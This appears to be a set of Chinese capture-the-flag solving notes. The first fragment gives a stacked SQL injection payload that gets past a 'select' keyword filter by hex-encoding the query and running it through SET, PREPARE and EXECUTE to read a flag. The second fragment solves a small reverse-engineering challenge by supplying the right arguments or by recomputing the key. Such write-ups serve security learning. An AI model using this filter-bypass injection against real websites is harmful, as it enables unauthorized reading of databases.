因为select被过滤了,所以先将select * from
1919810931114514
进行16进制编码 再通过构造payload得 ;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;# 进而得到flag prepare…from…是预处理语句,会进行编码转换。 execute用来执行由SQLPrepare创建的SQL语句。 SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
8b6405c25fe447fa804c6833a0d72808.c
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]) {
if (argc != 4) {
printf("what?\\n");
exit(1);
}
unsigned int first = atoi(argv[1]);
if (first != 0xcafe) {
printf("you are wrong, sorry.\\n");
exit(2);
}
unsigned int second = atoi(argv[2]);
if (second % 5 == 3 || second % 17 != 8) {
printf("ha, you won't get it!\\n");
exit(3);
}
if (strcmp("h4cky0u", argv[3])) {
printf("so close, dude!\\n");
exit(4);
}
printf("Brr wrrr grr\\n");
unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;
printf("Get your key: ");
printf("%x\\n", hash);
return 0;
}
atoi (表示ascii to integer)
./string 51966 25 h4cky0u
或者 去判断
#include <stdio.h>
#include <string.h>
int main() {
unsigned int hash = 0xcafe * 31337 + 8 * 11 + strlen("h4cky0u") - 1615810207;
printf("Get your key: ");
printf("%x\\n", hash);
return 0;
}